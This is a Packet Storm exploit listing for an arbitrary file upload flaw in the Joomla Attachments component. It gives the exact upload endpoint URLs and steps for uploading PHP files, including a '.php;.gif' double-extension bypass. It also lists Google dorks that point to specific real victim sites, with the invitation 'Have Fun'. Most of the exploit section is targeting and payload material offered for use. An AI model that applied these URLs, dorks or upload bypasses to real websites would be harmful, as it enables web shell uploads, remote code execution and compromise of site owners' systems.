what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Attachments 3.x File Upload

Joomla Attachments 3.x File Upload
Posted May 26, 2019
Authored by KingSkrupellos

Joomla Attachments component version 3.x suffers from a remote file upload vulnerability.

tags | exploit, remote, file upload
SHA-256 | d5cf192e5152e876357d03867d1696944ce222fb9fd6fc28bbda9eb210bdfcec

Joomla Attachments 3.x File Upload

Change Mirror Download
####################################################################

# Exploit Title : Joomla Com_Attachments Components 3.x Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/05/2019
# Vendor Homepage : jmcameron.net
# Software Download Links : jmcameron.net/attachments/
jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip
joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip
joomlacode.org/gf/project/attachments/frs/
github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/
# Software Information Links : extensions.joomla.org/extension/attachments/
joomlacode.org/gf/project/attachments/
joomlacode.org/gf/project/attachments3/
# Joomla Affected Versions :
Joomla 3.4.8
Joomla 3.5.1
Joomla 3.6.5
Joomla 3.8.1
Joomla 3.8.11
Joomla 3.8.3
Joomla 3.9.6
# Software Affected Versions [ Component Com_Attachments ] :
2.2.2 and 3.2.6 - 3.x / All previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks :
inurl:/index.php?option=com_attachments&task=upload
intext:Copyright (C) 2006-2020 BSA Troop 444. All Rights Reserved.
intext:Treadmill Desk from TrekDesk
intext:Copyright © 2015 Ashleigh-D. All rights reserved. Website designed by Mojosync Pty Ltd using Joomla
intext:Fundación Jesuitas Paraguay
intext:© 2019 Mars Society Polska
intext:Designed by atict.com
intext:Copyright © 2017. All Rights Reserved.Webaloss - Realizzazione siti webwebaloss.com
intext:Designed by Burosphere.
intext:Conselho Nacional de Recursos Hídricos CNRH Ministerio Do Desenvolvimento Regional
and more on Google and other Search Engines...... Have Fun....
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link [ Similar ] : dl.packetstormsecurity.net/1902-exploits/joomlaattachments326-shell.txt

####################################################################

# Description about Software :
***************************
The 'Attachments' extension allows files to be uploaded and attached to content
articles in Joomla. Includes a plugin to display attachments and a component
for uploading and managing attachments.

####################################################################

# Impact :
***********
Joomla Attachments Components 3.x and other previous versions could allow a
remote attacker to upload arbitrary files upload/shell upload, caused by the improper validation
of file extensions by the multiple scripts to index.php. The issue occurs because
the application fails to adequately sanitize user-supplied input.
Exploiting this issue will allow attackers to execute arbitrary code within
the context of the affected application. This may facilitate unauthorized access
or privilege escalation; other attacks may also possible.
By sending a specially-crafted HTTP request, a remote attacker could exploit
this vulnerability to upload a malicious PHP script, which could allow the
attacker to execute arbitrary PHP code on the vulnerable system.

####################################################################

# Arbitrary File Upload/Unauthorized File Insertion Exploit :
****************************************************
/index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme

/index.php?option=com_attachments&task=upload&uri=file&parent_id=[ARTICLE-ID-NUMBER]/&parent_type=com_content&tmpl=component&from=closeme

Click to " Select file to upload instead " - Fill the Form - Published => '' Yes '' and Click " Public "

Attach file: - Upload your .txt .jpg .gif .png .phtml .php;.gif file to the vulnerable system.

# Directory File Path :
********************
/attachments/article/[ARTICLE-ID-NUMBER]/kingskrupellos.txt

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close